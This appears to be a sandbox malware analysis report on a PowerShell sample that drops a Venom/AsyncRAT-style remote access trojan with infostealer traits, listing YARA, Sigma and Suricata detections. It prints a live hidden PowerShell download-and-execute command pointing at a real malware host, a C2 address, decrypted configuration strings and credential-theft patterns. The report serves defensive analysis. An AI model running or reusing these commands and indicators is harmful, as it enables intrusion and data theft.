Win32_CacheMemory
6.2.powershell.exe.5e16f80.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x28fa42:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x58d462:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x28f9a5:$s2: L2Mgc2NodGFza3MgL2 0x58d3c5:$s2: L2Mgc2NodGFza3MgL2
6.2.powershell.exe.5e16f80.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x29b62a:$q1: Select * from Win32_CacheMemory 0x59904a:$q1: Select * from Win32_CacheMemory 0x29b66a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x59908a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x29b6b8:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x5990d8:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x29b706:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x599126:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.5e16f80.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x293806:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x591226:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
6.2.powershell.exe.5e16f80.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2991a1:$s1: \VPN\NordVPN 0x596bc1:$s1: \VPN\NordVPN 0x299187:$s2: \VPN\OpenVPN 0x596ba7:$s2: \VPN\OpenVPN 0x299169:$s3: \VPN\ProtonVPN 0x596b89:$s3: \VPN\ProtonVPN
6.2.powershell.exe.5e16f80.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x28deeb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x58b90b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x28df5d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x58b97d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x28dfe7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x58ba07:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x28e079:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x58ba99:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x28e0e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x58bb03:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x28e155:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x58bb75:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x28e1eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x58bc0b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x28e27b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x58bc9b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.powershell.exe.5e16f80.6.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x2fdfe8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty 0x2fe004:$x3: StormKitty 0x27dff4:$s2: GetAntivirus 0x57ba14:$s2: GetAntivirus 0x29405a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x591a7a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x28d4a5:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x58aec5:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x28eacd:$s6: "encrypted_key":"(.?)" 0x58c4ed:$s6: "encrypted_key":"(.?)"
6.2.powershell.exe.5e16f80.6.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28baa2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x5894c2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x287c16:$s6: VirtualBox 0x297795:$s6: VirtualBox 0x585636:$s6: VirtualBox 0x5951b5:$s6: VirtualBox 0x2931b2:$s8: Win32_ComputerSystem 0x2976fb:$s8: Win32_ComputerSystem 0x590bd2:$s8: Win32_ComputerSystem 0x59511b:$s8: Win32_ComputerSystem 0x2902de:$s9: Win32_Process Where ParentProcessID= 0x58dcfe:$s9: Win32_Process Where ParentProcessID= 0x28fefb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x58d91b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28ff98:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x58d9b8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2900ad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x58dacd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x290195:$cnc4: POST / HTTP/1.1 0x58dbb5:$cnc4: POST / HTTP/1.1
Click to see the 133 entries

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\Temp\Package.exe, ParentImage: C:\Windows\Temp\Package.exe, ParentProcessId: 7644, ParentProcessName: Package.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ProcessId: 7680, ProcessName: cmd.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wrcaf.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wrcaf.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wrcaf.ps1", ProcessId: 7424, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7728, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline", ProcessId: 7856, ProcessName: csc.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7680, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ProcessId: 7728, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\Temp\Package.exe, ParentImage: C:\Windows\Temp\Package.exe, ParentProcessId: 7644, ParentProcessName: Package.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ProcessId: 7680, ProcessName: cmd.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7728, TargetFilename: C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wrcaf.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wrcaf.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wrcaf.ps1", ProcessId: 7424, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7424, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7728, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline", ProcessId: 7856, ProcessName: csc.exe

Suricata Signatures

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T19:13:09.179501+0100	2842478	1	Malware Command and Control Activity Detected	157.20.182.177	4449	192.168.2.4	49732	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://147.45.44.131/infopage/rwvg1.exe	Avira URL Cloud: Label: malware
Source: http://147.45.44.131/infopage/iviewers.dll	Avira URL Cloud: Label: malware
Source: http://147.45.44.131/infopage/iubn.ps1	Avira URL Cloud: Label: malware
Source: http://147.45.44.131/infopage/ersyb.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.dll

Avira: detection malicious, Label: HEUR/AGEN.1300034

Multi AV Scanner detection for submitted file

Source: wrcaf.ps1

ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.dll

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: 4449
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: 157.20.182.177
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: RAT + hVNC 6.0.5
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: false
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: rbdebzqnfarpyomol
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: MIICLjCCAZegAwIBAgIVAPMNUbaXLLtiHcN1m+dlPpK7vns9MA0GCSqGSIb3DQEBDQUAMGIxFTATBgNVBAMMDFZlbm9tIFNlcnZlcjESMBAGA1UECwwJYWxleGVpa3VuMRswGQYDVQQKDBJWZW5vbSBCeSBhbGV4ZWlrdW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDAzMTgxNjQ3MjZaFw0zNDEyMjYxNjQ3MjZaMBAxDjAMBgNVBAMMBVZlbm9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCaTwbFDhuWkASq9P+NWgPLnP41KwsDJJLX7xv2vo4FUXTwpEsoIrbqvSKldDp6m3lNHXNWYqqy0JX1ZnvClJ/gvVpmMCJfzkIDbW0sKPoOMmwx4PjzdNDQbKSSmM6rMMu8tDchwJEfQtMlgGPXFsMnPTYj6xNeMBCjcTIP5gwFCQIDAQABozIwMDAdBgNVHQ4EFgQU06NiTQAo8LSYzcJVCrt9Ah49blwwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQBg3cQkJK1HiQGjHKgDefp3ooSUSiEh+SRWC4Q/Jsp2TsM6Me9+ix/2g+oxV6/rhaeJkcDDCBtnjouhViDhezLBfl3oE0P29Ssq/skwUyjEZDScIepLewWrtQYtjyYbQL/ubsa0hoLDSZaKydxgH8cAtvOvMqE6WjrfEvcVupZLMQ==
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: Q+AFJAFiCL8OIXnK8vpppK2iElr5z1WborIl7rv6KiQoJrBbUTm5VXnSYAmidoRGFDhbPZQNsmEzkAX+OxkvuApCdcHhIykks+QzQbWVaQ2kFUGLle9WnlLZKzmw4R0L8hrBDa6GtG0avdXbvgSOzH5rALYyXUgmgBPNJoJdbSM=
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: null
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: false
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: false
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: Default
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: false
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack	String decryptor: false

Source:	Binary string: C:\Users\Administrator\source\repos\Project9\Release\Project9.pdb source: Package.exe, 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmp, iviewers.dll.0.dr
Source:	Binary string: OLEView.pdb source: Package.exe, Package.exe, 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Package.exe.0.dr
Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: $^q7C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.pdb source: powershell.exe, 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 157.20.182.177:4449 -> 192.168.2.4:49732

Yara detected Generic Downloader

Source: Yara match	File source: 6.2.powershell.exe.4e4ced4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 157.20.182.177:4449

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:12:58 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 11:05:36 GMTETag: "325e0-62ab7244bf291"Accept-Ranges: bytesContent-Length: 206304Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ae 14 73 f9 ea 75 1d aa ea 75 1d aa ea 75 1d aa fe 1e 1e ab e2 75 1d aa fe 1e 1c ab fd 75 1d aa ea 75 1c aa ae 77 1d aa fe 1e 18 ab c4 75 1d aa fe 1e 19 ab a5 75 1d aa fe 1e e2 aa eb 75 1d aa fe 1e 1f ab eb 75 1d aa 52 69 63 68 ea 75 1d aa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 9e e4 2e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 14 00 16 02 00 00 f2 00 00 00 00 00 00 a0 f0 01 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 05 00 01 00 00 00 00 00 00 30 03 00 00 04 00 00 26 47 03 00 02 00 40 c1 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 48 02 00 f0 00 00 00 00 60 02 00 90 96 00 00 00 00 00 00 00 00 00 00 00 04 03 00 e0 21 00 00 00 00 03 00 18 2a 00 00 f0 9e 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 9f 00 00 18 00 00 00 48 9f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 6c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 14 02 00 00 10 00 00 00 16 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 74 0e 00 00 00 30 02 00 00 08 00 00 00 1a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 2c 1d 00 00 00 40 02 00 00 1e 00 00 00 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 90 96 00 00 00 60 02 00 00 98 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 2a 00 00 00 00 03 00 00 2c 00 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
